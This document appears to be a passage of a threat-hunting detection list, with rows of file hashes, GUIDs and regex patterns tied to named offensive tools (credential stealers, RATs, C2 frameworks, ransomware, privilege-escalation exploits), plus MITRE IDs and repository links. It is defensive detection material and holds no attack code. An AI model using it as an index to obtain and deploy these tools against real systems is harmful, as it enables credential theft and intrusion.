"*c3b7a095eb5860b4414e354becc07bf30a9133737164b89b689873ee9f9c7bd6*",".{0,1000}c3b7a095eb5860b4414e354becc07bf30a9133737164b89b689873ee9f9c7bd6.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*C3C49F45-2589-4E04-9C50-71B6035C14AE*",".{0,1000}C3C49F45\-2589\-4E04\-9C50\-71B6035C14AE.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","0","N/A","10","10","2110","708","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z" "*c3e38acce6f3bca15fac349fd9f7eb41aa415a76fdf150bd0e75bc096467402f*",".{0,1000}c3e38acce6f3bca15fac349fd9f7eb41aa415a76fdf150bd0e75bc096467402f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*c3f50756edbddbf72190cbdac5a0084b2c11e6aeab95b63d4da786547a693d73*",".{0,1000}c3f50756edbddbf72190cbdac5a0084b2c11e6aeab95b63d4da786547a693d73.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c4209649986c6f8b14571e8f08553cd89046c45a1a03d1ab1b69b03d4b745eb9*",".{0,1000}c4209649986c6f8b14571e8f08553cd89046c45a1a03d1ab1b69b03d4b745eb9.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*c439db633c51838ba79ec999e0f5b4533379b94d2afeb5944fd15250fa5a86de*",".{0,1000}c439db633c51838ba79ec999e0f5b4533379b94d2afeb5944fd15250fa5a86de.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*c45986288840a01919c3b744499554d5a0608a2a109de0952b80303923cd3ce8*",".{0,1000}c45986288840a01919c3b744499554d5a0608a2a109de0952b80303923cd3ce8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c47d02f06bc853b2917607af695be6f81013ffa31f4ff13e6bbf8ff835ee40ec*",".{0,1000}c47d02f06bc853b2917607af695be6f81013ffa31f4ff13e6bbf8ff835ee40ec.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c498592eebde7dec4227e1fe83002fca10beab096138e6d64278ef868a85900f*",".{0,1000}c498592eebde7dec4227e1fe83002fca10beab096138e6d64278ef868a85900f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c4ae18df3ccf102f9ae58af818678b96adb1fdc581ffc6625367ffeda420a33f*",".{0,1000}c4ae18df3ccf102f9ae58af818678b96adb1fdc581ffc6625367ffeda420a33f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*c4c624294090555e88aff480bc19f55ffcd1b51dda2dbf55fe35dde60b374fd1*",".{0,1000}c4c624294090555e88aff480bc19f55ffcd1b51dda2dbf55fe35dde60b374fd1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*c4c99f7ff1976731ad0a4c3514f291f925f030c3c80d70d93ca98e3bf69a853e*",".{0,1000}c4c99f7ff1976731ad0a4c3514f291f925f030c3c80d70d93ca98e3bf69a853e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c4db3b4b49d8d75696f5641276d9ae1bcb990aaec46566719a7519810deb2f98*",".{0,1000}c4db3b4b49d8d75696f5641276d9ae1bcb990aaec46566719a7519810deb2f98.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" 
"*c4e9806596b8e6123a595395b0efe604176dfd2e767418fe4adf69c70de557b5*",".{0,1000}c4e9806596b8e6123a595395b0efe604176dfd2e767418fe4adf69c70de557b5.{0,1000}","offensive_tool_keyword","DNS-Tunnel-Keylogger","Keylogging server and client that uses DNS tunneling/exfiltration to transmit keystrokes","T1056.001 - T1048.003","TA0009 - TA0011","N/A","N/A","Collection","https://github.com/Geeoon/DNS-Tunnel-Keylogger","1","0","N/A","9","2","196","31","2024-04-13T13:58:04Z","2024-01-10T17:25:58Z" "*c4f026c01e451e1afa61ab8233fd15a3c0b4da615eae5d893db82b84bbe49e40*",".{0,1000}c4f026c01e451e1afa61ab8233fd15a3c0b4da615eae5d893db82b84bbe49e40.{0,1000}","offensive_tool_keyword","RevengeRAT-Stub-Cssharp","RevengeRAT - AsyncRAT Simple RAT","T1219 - T1055 - T1569.002 - T1035 - T1071 - T1105","TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/NYAN-x-CAT/RevengeRAT-Stub-Cssharp","1","0","N/A","10","10","81","47","2020-03-02T11:34:36Z","2019-09-15T09:39:07Z" "*C4RD N4M3: *| NUMB3R:*",".{0,1000}C4RD\sN4M3\:\s.{0,1000}\|\sNUMB3R\:.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*c51005736c67304bf96c0e5421ce44f700578b87dbc912a820fd38dfa146fe41*",".{0,1000}c51005736c67304bf96c0e5421ce44f700578b87dbc912a820fd38dfa146fe41.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" 
"*C526B877-6AFF-413C-BC03-1837FB63BC22*",".{0,1000}C526B877\-6AFF\-413C\-BC03\-1837FB63BC22.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*c53bc13170b9ff26b0cca93715e947318e06cafe0d98cf825eabffe3c7f763cb*",".{0,1000}c53bc13170b9ff26b0cca93715e947318e06cafe0d98cf825eabffe3c7f763cb.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*c59750dfe30a62ae41e8ba1fe138ce5bc575041afa2d7b87645e2f5d54526a9d*",".{0,1000}c59750dfe30a62ae41e8ba1fe138ce5bc575041afa2d7b87645e2f5d54526a9d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*c5af796b44a3d3d09e184ef622ad002b8298696c2de139392fd35898f5073527*",".{0,1000}c5af796b44a3d3d09e184ef622ad002b8298696c2de139392fd35898f5073527.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" 
"*c5bcfd00d0b8fda7c4b20cdc9649713d9f01dd12f61ce8ee9c45ec424a6bbdf2*",".{0,1000}c5bcfd00d0b8fda7c4b20cdc9649713d9f01dd12f61ce8ee9c45ec424a6bbdf2.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1602 - T1119 - T1005","TA0009","N/A","N/A","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*c5d484d2c6817bbf05a900cd6bced458311b72af57d14b29421816620769f4ac*",".{0,1000}c5d484d2c6817bbf05a900cd6bced458311b72af57d14b29421816620769f4ac.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*c5deda524fb386a888b702d1eef8d55ad8b619affb88b2ed8bd913d24a3cde98*",".{0,1000}c5deda524fb386a888b702d1eef8d55ad8b619affb88b2ed8bd913d24a3cde98.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c60fd707d75bddb69967290cc46c2acf53ffd76899f1cda2f88be8165a25bb1c*",".{0,1000}c60fd707d75bddb69967290cc46c2acf53ffd76899f1cda2f88be8165a25bb1c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*c6306acc18cfb5cd38d33896213d4b8ba1b5f3b42e55d9dd9678bab4cbd31d54*",".{0,1000}c6306acc18cfb5cd38d33896213d4b8ba1b5f3b42e55d9dd9678bab4cbd31d54.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*c631eda13fb95658b81e31a06554339857def299970639d8e3ee646df70d9454*",".{0,1000}c631eda13fb95658b81e31a06554339857def299970639d8e3ee646df70d9454.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c63738e628229ff8c8611bac4d15f1cd87fd58c88071765e147d1a50c56d37a2*",".{0,1000}c63738e628229ff8c8611bac4d15f1cd87fd58c88071765e147d1a50c56d37a2.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*c654a7ea1dc15b2c30ddeeba64c1f1fb4e7f1f53cb858a7f78ce508e2b6f259a*",".{0,1000}c654a7ea1dc15b2c30ddeeba64c1f1fb4e7f1f53cb858a7f78ce508e2b6f259a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*c66a79726a52709cb4ceb004f0b2dda9d7159aa04678e002d9be27fb7d887a3c*",".{0,1000}c66a79726a52709cb4ceb004f0b2dda9d7159aa04678e002d9be27fb7d887a3c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c6962ca89b28d1e9a7aa34b7de5c629e29a8eb732a0b8010406de83d0f2f8c2a*",".{0,1000}c6962ca89b28d1e9a7aa34b7de5c629e29a8eb732a0b8010406de83d0f2f8c2a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c6a9c538cf33c226c5ff0d37557c0d7d59c62bf37a2765fa090c1ee962edf02d*",".{0,1000}c6a9c538cf33c226c5ff0d37557c0d7d59c62bf37a2765fa090c1ee962edf02d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*c6aa399c903df33b37acf2e4d8a1e7f514d4e09f046e50dfe5efdb980cf34c16*",".{0,1000}c6aa399c903df33b37acf2e4d8a1e7f514d4e09f046e50dfe5efdb980cf34c16.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*c6bd027f5269a980cd4deffcdbdab77eb317db2a9737d727b55fe37710cd2f95*",".{0,1000}c6bd027f5269a980cd4deffcdbdab77eb317db2a9737d727b55fe37710cd2f95.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*c6e09870a9f7d1e74d9364d7a4d27cc0ad96f1637ee3e60e2c2df5169972058c*",".{0,1000}c6e09870a9f7d1e74d9364d7a4d27cc0ad96f1637ee3e60e2c2df5169972058c.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" 
"*c6ec76b8a6041bb25bd2699684ad58f63a6923aa1e4985438345fd99cdf11e20*",".{0,1000}c6ec76b8a6041bb25bd2699684ad58f63a6923aa1e4985438345fd99cdf11e20.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c6faca2a240b79782651662d2de7511752a97dc187a93955bc83ef3e1b17326f*",".{0,1000}c6faca2a240b79782651662d2de7511752a97dc187a93955bc83ef3e1b17326f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c6ffad5c09f5fb6fe7241d3fe9c9cd968ceea15e483a180ac45bd0b4e15d7bcd*",".{0,1000}c6ffad5c09f5fb6fe7241d3fe9c9cd968ceea15e483a180ac45bd0b4e15d7bcd.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*c708b83f-4167-4b4c-a1db-d2011ecb3200*",".{0,1000}c708b83f\-4167\-4b4c\-a1db\-d2011ecb3200.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","220","38","2024-04-12T21:42:47Z","2020-02-18T12:22:50Z" "*c725919e6357126d512c638f993cf572112f323da359645e4088f789eb4c7b8c*",".{0,1000}c725919e6357126d512c638f993cf572112f323da359645e4088f789eb4c7b8c.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","2","112","31","2024-03-01T14:36:32Z","2023-09-21T02:09:48Z" "*c730a89142b73d047b4387f6f3f0d8dfacef57a2e4945a0a942cc72f0bd05253*",".{0,1000}c730a89142b73d047b4387f6f3f0d8dfacef57a2e4945a0a942cc72f0bd05253.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*C73A4893-A5D1-44C8-900C-7B8850BBD2EC*",".{0,1000}C73A4893\-A5D1\-44C8\-900C\-7B8850BBD2EC.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*c786890a660e4bca317ce667bc660504f8167a5d5965867d748ed02d0caa5046*",".{0,1000}c786890a660e4bca317ce667bc660504f8167a5d5965867d748ed02d0caa5046.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*c794d9b0bef6c7d8838f5130e2e0ae4c8bed3ec35cfb9bf502520dcfab38bde2*",".{0,1000}c794d9b0bef6c7d8838f5130e2e0ae4c8bed3ec35cfb9bf502520dcfab38bde2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
